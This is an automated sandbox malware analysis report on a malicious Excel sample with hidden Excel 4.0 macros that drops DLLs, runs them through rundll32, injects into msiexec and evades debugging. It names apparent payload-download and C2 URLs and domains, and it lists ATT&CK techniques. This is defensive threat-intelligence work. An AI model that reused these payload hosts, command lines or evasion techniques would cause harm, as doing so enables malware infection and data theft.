Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion:

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 4_2_023469A0 CreateToolhelp32Snapshot,GetCurrentProcessId,Thread32First,GetLastError,Thread32Next,

4_2_023469A0

Source: C:\Windows\SysWOW64\msiexec.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Ytziy\ipnyw.dll	Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\scfrd[1].dll	Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Dropped PE file which has not been started: C:\ProgramData\formnet.dll	Jump to dropped file

Source: C:\Windows\SysWOW64\msiexec.exe TID: 2856

Thread sleep time: -240000s >= -30000s

Jump to behavior

Anti Debugging:

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 4_2_023FABA4 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

4_2_023FABA4

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 4_2_023469A0 CreateToolhelp32Snapshot,GetCurrentProcessId,Thread32First,GetLastError,Thread32Next,

4_2_023469A0

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 4_2_0233D830 LoadLibraryA,GetProcAddress,

4_2_0233D830

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_02342EF0 mov eax, dword ptr fs:[00000030h]	4_2_02342EF0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_02410D28 mov eax, dword ptr fs:[00000030h]	4_2_02410D28
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_02410C5E mov eax, dword ptr fs:[00000030h]	4_2_02410C5E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_02410865 push dword ptr fs:[00000030h]	4_2_02410865
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 5_2_000A2EF0 mov eax, dword ptr fs:[00000030h]	5_2_000A2EF0

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_023FABA4 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,		4_2_023FABA4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_2_023FA0CC _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,		4_2_023FA0CC

HIPS / PFW / Operating System Protection Evasion:

Contains functionality to inject code into remote processes

Show sources

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 4_2_0233AE40 CreateProcessA,VirtualAllocEx,WriteProcessMemory,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,SetThreadContext,VirtualProtectEx,ResumeThread,ExitProcess,

4_2_0233AE40

Yara detected hidden Macro 4.0 in Excel

Show sources

Source: Yara match

File source: case (1522).xls, type: SAMPLE

Source: C:\Windows\System32\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\System32\rundll32.exe' C:\ProgramData\formnet.dll,DllRegisterServer			Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\msiexec.exe msiexec.exe			Jump to behavior

Source: msiexec.exe, 00000005.00000002.2361272927.0000000000850000.00000002.00000001.sdmp	Binary or memory string: Program Manager
Source: msiexec.exe, 00000005.00000002.2361272927.0000000000850000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: msiexec.exe, 00000005.00000002.2361272927.0000000000850000.00000002.00000001.sdmp	Binary or memory string: !Progman

Language, Device and Operating System Detection:

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 4_2_023F968A cpuid

4_2_023F968A

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: GetLocaleInfoA,

4_2_023FF6BB

Source: C:\Windows\SysWOW64\msiexec.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion DigitalProductId

Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 4_2_023F95A6 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,

4_2_023F95A6

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 4_2_02331A00 CreateDialogParamW,GetVersion,

4_2_02331A00

Source: C:\Windows\SysWOW64\msiexec.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Scripting4	Path Interception	Access Token Manipulation1	Masquerading1	OS Credential Dumping	System Time Discovery1	Remote Services	Archive Collected Data1	Exfiltration Over Other Network Medium	Encrypted Channel12	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Native API1	Boot or Logon Initialization Scripts	Process Injection112	Disable or Modify Tools1	LSASS Memory	Security Software Discovery2	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	Ingress Tool Transfer2	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	Exploitation for Client Execution43	Logon Script (Windows)	Logon Script (Windows)	Virtualization/Sandbox Evasion1	Security Account Manager	Virtualization/Sandbox Evasion1	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Non-Application Layer Protocol1	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Access Token Manipulation1	NTDS	Process Discovery2	Distributed Component Object Model	Input Capture	Scheduled Transfer	Application Layer Protocol2	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Process Injection112	LSA Secrets	Remote System Discovery1	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Scripting4	Cached Domain Credentials	File and Directory Discovery1	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Obfuscated Files or Information2	DCSync	System Information Discovery35	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Rundll321	Proc Filesystem	Network Service Scanning	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application	PowerShell	At (Linux)	At (Linux)	Software Packing2	/etc/passwd and /etc/shadow	System Network Connections Discovery	Software Deployment Tools	Data Staged	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	Web Protocols	Rogue Cellular Base Station		Data Destruction

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

No Antivirus matches

Dropped Files

No Antivirus matches

Unpacked PE Files

Source	Detection	Scanner	Label	Link	Download
4.2.rundll32.exe.2330000.0.unpack	100%	Avira	TR/Crypt.ZPACK.Gen2		Download File
5.2.msiexec.exe.90000.0.unpack	100%	Avira	TR/Crypt.ZPACK.Gen2		Download File

Domains

Source	Detection	Scanner	Label	Link
gadgetswolf.com	0%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label
http://wmwifbajxxbcxmucxmlc.com/files/april24.dll)	0%	Avira URL Cloud	safe
https://govemedico.tk/7	0%	Avira URL Cloud	safe
http://crl3.digicert	0%	Avira URL Cloud	safe
http://ocsp.entrust.net03	0%	URL Reputation	safe
http://ocsp.entrust.net03	0%	URL Reputation	safe
http://ocsp.entrust.net03	0%	URL Reputation	safe
http://ocsp.entrust.net03	0%	URL Reputation	safe
https://homesoapmolds.com/post.phpr	0%	Avira URL Cloud	safe
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0	0%	URL Reputation	safe
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0	0%	URL Reputation	safe
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0	0%	URL Reputation	safe
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0	0%	URL Reputation	safe
https://gadgetswolf.com/	0%	Avira URL Cloud	safe
https://rnollg.com/kev/scfrd.dll	0%	Avira URL Cloud	safe
http://www.diginotar.nl/cps/pkioverheid0	0%	URL Reputation	safe
http://www.diginotar.nl/cps/pkioverheid0	0%	URL Reputation	safe
http://www.diginotar.nl/cps/pkioverheid0	0%	URL Reputation	safe
https://gadgetswolf.com/post.php	0%	Avira URL Cloud	safe
http://crt.comod	0%	Avira URL Cloud	safe
https://govemedico.tk/	0%	Avira URL Cloud	safe
https://homesoapmolds.com/post.php	0%	Avira URL Cloud	safe
http://windowsmedia.com/redir/services.asp?WMPFriendly=true	0%	URL Reputation	safe
http://windowsmedia.com/redir/services.asp?WMPFriendly=true	0%	URL Reputation	safe
http://windowsmedia.com/redir/services.asp?WMPFriendly=true	0%	URL Reputation	safe
http://crl3.digicertP	0%	Avira URL Cloud	safe
http://crl.pkioverheid.nl/DomOvLatestCRL.crl0	0%	URL Reputation	safe
http://crl.pkioverheid.nl/DomOvLatestCRL.crl0	0%	URL Reputation	safe
http://crl.pkioverheid.nl/DomOvLatestCRL.crl0	0%	URL Reputation	safe
http://www.icra.org/vocabulary/.	0%	URL Reputation	safe
http://www.icra.org/vocabulary/.	0%	URL Reputation	safe
http://www.icra.org/vocabulary/.	0%	URL Reputation	safe
http://www.%s.comPA	0%	URL Reputation	safe
http://www.%s.comPA	0%	URL Reputation	safe
http://www.%s.comPA	0%	URL Reputation	safe
https://gadgetswolf.com/post.phpi	0%	Avira URL Cloud	safe
http://wmwifbajxxbcxmucxmlc.com/files/april24.dll~	0%	Avira URL Cloud	safe
http://ocsp.entrust.net0D	0%	URL Reputation	safe
http://ocsp.entrust.net0D	0%	URL Reputation	safe
http://ocsp.entrust.net0D	0%	URL Reputation	safe
https://rnollg.com/kev/scfrd.dll$8	0%	Avira URL Cloud	safe
https://homesoapmolds.com/	0%	Avira URL Cloud	safe
https://gadgetswolf.com/post.php_	0%	Avira URL Cloud	safe
https://govemedico.tk/post.php	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
homesoapmolds.com	104.21.60.169	true	false		unknown
rnollg.com	172.67.150.228	true	false		unknown
gadgetswolf.com	172.67.200.147	true	false	0%, Virustotal, Browse	unknown
govemedico.tk	104.21.73.69	true	false		unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://wmwifbajxxbcxmucxmlc.com/files/april24.dll)	77EE0000.0.dr	false	Avira URL Cloud: safe	unknown
http://www.windows.com/pctv.	rundll32.exe, 00000004.00000002.2160422362.0000000001F50000.00000002.00000001.sdmp	false		high
http://investor.msn.com	rundll32.exe, 00000003.00000002.2161150492.0000000001B70000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2160422362.0000000001F50000.00000002.00000001.sdmp	false		high
http://www.msnbc.com/news/ticker.txt	rundll32.exe, 00000003.00000002.2161150492.0000000001B70000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2160422362.0000000001F50000.00000002.00000001.sdmp	false		high
http://crl.entrust.net/server1.crl0	msiexec.exe, 00000005.00000002.2361132806.0000000000324000.00000004.00000020.sdmp	false		high
https://govemedico.tk/7	msiexec.exe, 00000005.00000002.2361128084.0000000000319000.00000004.00000020.sdmp	false	Avira URL Cloud: safe	unknown
http://crl3.digicert	msiexec.exe, 00000005.00000002.2361161778.000000000036E000.00000004.00000020.sdmp	false	Avira URL Cloud: safe	unknown
http://ocsp.entrust.net03	msiexec.exe, 00000005.00000002.2361132806.0000000000324000.00000004.00000020.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://homesoapmolds.com/post.phpr	msiexec.exe, 00000005.00000002.2361183762.000000000039B000.00000004.00000020.sdmp	false	Avira URL Cloud: safe	unknown
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0	msiexec.exe, 00000005.00000002.2361161778.000000000036E000.00000004.00000020.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://gadgetswolf.com/	msiexec.exe, 00000005.00000002.2361132806.0000000000324000.00000004.00000020.sdmp	false	Avira URL Cloud: safe	unknown
https://rnollg.com/kev/scfrd.dll	before.1.0.0.sheet.csv_unpack	true	Avira URL Cloud: safe	unknown
http://www.diginotar.nl/cps/pkioverheid0	msiexec.exe, 00000005.00000002.2361161778.000000000036E000.00000004.00000020.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://gadgetswolf.com/post.php	msiexec.exe, 00000005.00000003.2168531557.00000000003AA000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://crt.comod	msiexec.exe, 00000005.00000002.2361161778.000000000036E000.00000004.00000020.sdmp	false	Avira URL Cloud: safe	unknown
https://govemedico.tk/	msiexec.exe, 00000005.00000002.2361128084.0000000000319000.00000004.00000020.sdmp	false	Avira URL Cloud: safe	unknown
https://homesoapmolds.com/post.php	msiexec.exe, 00000005.00000002.2361183762.000000000039B000.00000004.00000020.sdmp	false	Avira URL Cloud: safe	unknown
http://windowsmedia.com/redir/services.asp?WMPFriendly=true	rundll32.exe, 00000003.00000002.2161457717.0000000001D57000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2160641047.0000000002137000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.hotmail.com/oe	rundll32.exe, 00000003.00000002.2161150492.0000000001B70000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2160422362.0000000001F50000.00000002.00000001.sdmp	false		high
http://crl3.digicertP	msiexec.exe, 00000005.00000002.2361161778.000000000036E000.00000004.00000020.sdmp	false	Avira URL Cloud: safe	unknown
http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check	rundll32.exe, 00000003.00000002.2161457717.0000000001D57000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2160641047.0000000002137000.00000002.00000001.sdmp	false		high
http://crl.pkioverheid.nl/DomOvLatestCRL.crl0	msiexec.exe, 00000005.00000002.2361161778.000000000036E000.00000004.00000020.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.icra.org/vocabulary/.	rundll32.exe, 00000003.00000002.2161457717.0000000001D57000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2160641047.0000000002137000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.	msiexec.exe, 00000005.00000002.2361345718.0000000001F10000.00000002.00000001.sdmp	false		high
http://investor.msn.com/	rundll32.exe, 00000003.00000002.2161150492.0000000001B70000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2160422362.0000000001F50000.00000002.00000001.sdmp	false		high
http://www.%s.comPA	msiexec.exe, 00000005.00000002.2361345718.0000000001F10000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	low
https://gadgetswolf.com/post.phpi	msiexec.exe, 00000005.00000002.2361132806.0000000000324000.00000004.00000020.sdmp	false	Avira URL Cloud: safe	unknown
http://wmwifbajxxbcxmucxmlc.com/files/april24.dll~	case (1522).xls	false	Avira URL Cloud: safe	unknown
http://ocsp.entrust.net0D	msiexec.exe, 00000005.00000002.2361161778.000000000036E000.00000004.00000020.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://rnollg.com/kev/scfrd.dll$8	case (1522).xls, 77EE0000.0.dr	false	Avira URL Cloud: safe	unknown
https://secure.comodo.com/CPS0	msiexec.exe, 00000005.00000002.2361161778.000000000036E000.00000004.00000020.sdmp	false		high
https://homesoapmolds.com/	msiexec.exe, 00000005.00000002.2361161778.000000000036E000.00000004.00000020.sdmp	false	Avira URL Cloud: safe	unknown
http://crl.entrust.net/2048ca.crl0	msiexec.exe, 00000005.00000002.2361161778.000000000036E000.00000004.00000020.sdmp	false		high
https://gadgetswolf.com/post.php_	msiexec.exe, 00000005.00000002.2361132806.0000000000324000.00000004.00000020.sdmp	false	Avira URL Cloud: safe	unknown
https://govemedico.tk/post.php	msiexec.exe, 00000005.00000002.2361161778.000000000036E000.00000004.00000020.sdmp	false	Avira URL Cloud: safe	unknown

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	ASN	ASN Name	Malicious
172.67.150.228	unknown	United States	13335	CLOUDFLARENETUS	false
104.21.60.169	unknown	United States	13335	CLOUDFLARENETUS	false
172.67.200.147	unknown	United States	13335	CLOUDFLARENETUS	false
104.21.73.69	unknown	United States	13335	CLOUDFLARENETUS	false

General Information

Joe Sandbox Version:	31.0.0 Emerald
Analysis ID:	344663
Start date:	26.01.2021
Start time:	21:30:59
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 6m 10s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	case (1522).xls
Cookbook file name:	defaultwindowsofficecookbook.jbs
Analysis system description:	Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of analysed new started processes analysed:	8
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.expl.evad.winXLS@7/12@4/4
EGA Information:	Failed
HDC Information:	Successful, ratio: 67.8% (good quality ratio 67.4%) Quality average: 89.5% Quality standard deviation: 19.2%
HCA Information:	Successful, ratio: 84% Number of executed functions: 40 Number of non-executed functions: 27
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .xls Found Word or Excel or PowerPoint or XPS Viewer Attach to Office via COM Scroll down Close Viewer
Warnings:	Show All Exclude process from analysis (whitelisted): dllhost.exe Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
21:32:15	API Interceptor	1200x Sleep call for process: msiexec.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
172.67.150.228	case (166).xls	Get hash	malicious	Browse
104.21.60.169	case (4374).xls	Get hash	malicious	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
gadgetswolf.com	case (4374).xls	Get hash	malicious	Browse	104.21.44.135
gadgetswolf.com	case (166).xls	Get hash	malicious	Browse	104.21.44.135
rnollg.com	case (166).xls	Get hash	malicious	Browse	172.67.150.228
govemedico.tk	case (4374).xls	Get hash	malicious	Browse	172.67.158.184
govemedico.tk	case (166).xls	Get hash	malicious	Browse	172.67.158.184
homesoapmolds.com	case (4374).xls	Get hash	malicious	Browse	104.21.60.169
homesoapmolds.com	case (166).xls	Get hash	malicious	Browse	172.67.198.109

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
CLOUDFLARENETUS	case (4374).xls	Get hash	malicious	Browse	104.21.60.169
	case (166).xls	Get hash	malicious	Browse	172.67.198.109
	PAYMENT.xlsx	Get hash	malicious	Browse	104.16.19.94
	PAYMENT.xlsx	Get hash	malicious	Browse	104.16.18.94
	Informacion.doc	Get hash	malicious	Browse	104.21.89.78
	PAYMENT.260121.xlsx	Get hash	malicious	Browse	162.159.133.233
	SecuriteInfo.com.Trojan.Packed2.42783.27799.exe	Get hash	malicious	Browse	104.21.19.200
	SecuriteInfo.com.Trojan.Packed2.42783.24703.exe	Get hash	malicious	Browse	104.21.19.200
	Ewqm21Iwdh.exe	Get hash	malicious	Browse	104.21.19.200
	a4iz7zkilq.exe	Get hash	malicious	Browse	104.21.19.200
	case (547).xls	Get hash	malicious	Browse	104.21.23.220
	Vcg9GH4CWw.exe	Get hash	malicious	Browse	104.21.19.200
	case (547).xls	Get hash	malicious	Browse	104.21.23.220
	nMn5eAMhBy.exe	Get hash	malicious	Browse	172.67.188.154
	sSPHg0Y2cZ.exe	Get hash	malicious	Browse	104.21.19.200
	vK6VPijMoq.exe	Get hash	malicious	Browse	104.21.19.200
	8gom3VEZLS.exe	Get hash	malicious	Browse	172.67.188.154
	y4Gpxq7eWg.exe	Get hash	malicious	Browse	104.21.19.200
	v07PSzmSp9.exe	Get hash	malicious	Browse	66.235.200.145
	COA for PI#Sc09283,PDF.exe	Get hash	malicious	Browse	104.21.19.200
CLOUDFLARENETUS	case (4374).xls	Get hash	malicious	Browse	104.21.60.169
	case (166).xls	Get hash	malicious	Browse	172.67.198.109
	PAYMENT.xlsx	Get hash	malicious	Browse	104.16.19.94
	PAYMENT.xlsx	Get hash	malicious	Browse	104.16.18.94
	Informacion.doc	Get hash	malicious	Browse	104.21.89.78
	PAYMENT.260121.xlsx	Get hash	malicious	Browse	162.159.133.233
	SecuriteInfo.com.Trojan.Packed2.42783.27799.exe	Get hash	malicious	Browse	104.21.19.200
	SecuriteInfo.com.Trojan.Packed2.42783.24703.exe	Get hash	malicious	Browse	104.21.19.200
	Ewqm21Iwdh.exe	Get hash	malicious	Browse	104.21.19.200
	a4iz7zkilq.exe	Get hash	malicious	Browse	104.21.19.200
	case (547).xls	Get hash	malicious	Browse	104.21.23.220
	Vcg9GH4CWw.exe	Get hash	malicious	Browse	104.21.19.200
	case (547).xls	Get hash	malicious	Browse	104.21.23.220
	nMn5eAMhBy.exe	Get hash	malicious	Browse	172.67.188.154
	sSPHg0Y2cZ.exe	Get hash	malicious	Browse	104.21.19.200
	vK6VPijMoq.exe	Get hash	malicious	Browse	104.21.19.200
	8gom3VEZLS.exe	Get hash	malicious	Browse	172.67.188.154
	y4Gpxq7eWg.exe	Get hash	malicious	Browse	104.21.19.200
	v07PSzmSp9.exe	Get hash	malicious	Browse	66.235.200.145
	COA for PI#Sc09283,PDF.exe	Get hash	malicious	Browse	104.21.19.200
CLOUDFLARENETUS	case (4374).xls	Get hash	malicious	Browse	104.21.60.169
	case (166).xls	Get hash	malicious	Browse	172.67.198.109
	PAYMENT.xlsx	Get hash	malicious	Browse	104.16.19.94
	PAYMENT.xlsx	Get hash	malicious	Browse	104.16.18.94
	Informacion.doc	Get hash	malicious	Browse	104.21.89.78
	PAYMENT.260121.xlsx	Get hash	malicious	Browse	162.159.133.233
	SecuriteInfo.com.Trojan.Packed2.42783.27799.exe	Get hash	malicious	Browse	104.21.19.200
	SecuriteInfo.com.Trojan.Packed2.42783.24703.exe	Get hash	malicious	Browse	104.21.19.200
	Ewqm21Iwdh.exe	Get hash	malicious	Browse	104.21.19.200
	a4iz7zkilq.exe	Get hash	malicious	Browse	104.21.19.200
	case (547).xls	Get hash	malicious	Browse	104.21.23.220
	Vcg9GH4CWw.exe	Get hash	malicious	Browse	104.21.19.200
	case (547).xls	Get hash	malicious	Browse	104.21.23.220
	nMn5eAMhBy.exe	Get hash	malicious	Browse	172.67.188.154
	sSPHg0Y2cZ.exe	Get hash	malicious	Browse	104.21.19.200
	vK6VPijMoq.exe	Get hash	malicious	Browse	104.21.19.200
	8gom3VEZLS.exe	Get hash	malicious	Browse	172.67.188.154
	y4Gpxq7eWg.exe	Get hash	malicious	Browse	104.21.19.200
	v07PSzmSp9.exe	Get hash	malicious	Browse	66.235.200.145
	COA for PI#Sc09283,PDF.exe	Get hash	malicious	Browse	104.21.19.200

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
7dcce5b76c8b17472d024758970a406b	case (4374).xls	Get hash	malicious	Browse	104.21.60.169 172.67.150.228 172.67.200.147 104.21.73.69
	case (166).xls	Get hash	malicious	Browse	104.21.60.169 172.67.150.228 172.67.200.147 104.21.73.69
	PAYMENT.xlsx	Get hash	malicious	Browse	104.21.60.169 172.67.150.228 172.67.200.147 104.21.73.69
	case (547).xls	Get hash	malicious	Browse	104.21.60.169 172.67.150.228 172.67.200.147 104.21.73.69
	Dridex-06-bc1b.xlsm	Get hash	malicious	Browse	104.21.60.169 172.67.150.228 172.67.200.147 104.21.73.69
	The Mental Health Center.xlsx	Get hash	malicious	Browse	104.21.60.169 172.67.150.228 172.67.200.147 104.21.73.69
	Remittance Advice 117301.xlsx	Get hash	malicious	Browse	104.21.60.169 172.67.150.228 172.67.200.147 104.21.73.69
	SC-TR1167700000.xlsx	Get hash	malicious	Browse	104.21.60.169 172.67.150.228 172.67.200.147 104.21.73.69
	PAYMENT INFO.xlsx	Get hash	malicious	Browse	104.21.60.169 172.67.150.228 172.67.200.147 104.21.73.69
	case (348).xls	Get hash	malicious	Browse	104.21.60.169 172.67.150.228 172.67.200.147 104.21.73.69
	RefTreeAnalyserXL.xlam	Get hash	malicious	Browse	104.21.60.169 172.67.150.228 172.67.200.147 104.21.73.69
	case (426).xls	Get hash	malicious	Browse	104.21.60.169 172.67.150.228 172.67.200.147 104.21.73.69
	case (250).xls	Get hash	malicious	Browse	104.21.60.169 172.67.150.228 172.67.200.147 104.21.73.69
	case (1447).xls	Get hash	malicious	Browse	104.21.60.169 172.67.150.228 172.67.200.147 104.21.73.69
	case (850).xls	Get hash	malicious	Browse	104.21.60.169 172.67.150.228 172.67.200.147 104.21.73.69
	SecuriteInfo.com.Heur.18472.xls	Get hash	malicious	Browse	104.21.60.169 172.67.150.228 172.67.200.147 104.21.73.69
	case (1543).xls	Get hash	malicious	Browse	104.21.60.169 172.67.150.228 172.67.200.147 104.21.73.69
	case_1581.xls	Get hash	malicious	Browse	104.21.60.169 172.67.150.228 172.67.200.147 104.21.73.69
	case (435).xls	Get hash	malicious	Browse	104.21.60.169 172.67.150.228 172.67.200.147 104.21.73.69
	INV-LASKUPDF2021.xlsx	Get hash	malicious	Browse	104.21.60.169 172.67.150.228 172.67.200.147 104.21.73.69

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Link
C:\ProgramData\formnet.dll	case (4374).xls	Get hash	malicious	Browse
C:\ProgramData\formnet.dll	case (166).xls	Get hash	malicious	Browse
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\scfrd[1].dll	case (4374).xls	Get hash	malicious	Browse
	case (166).xls	Get hash	malicious	Browse
C:\Users\user\AppData\Roaming\Ytziy\ipnyw.dll	case (4374).xls	Get hash	malicious	Browse
C:\Users\user\AppData\Roaming\Ytziy\ipnyw.dll	case (166).xls	Get hash	malicious	Browse

Created / dropped Files

C:\ProgramData\formnet.dll Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	933888
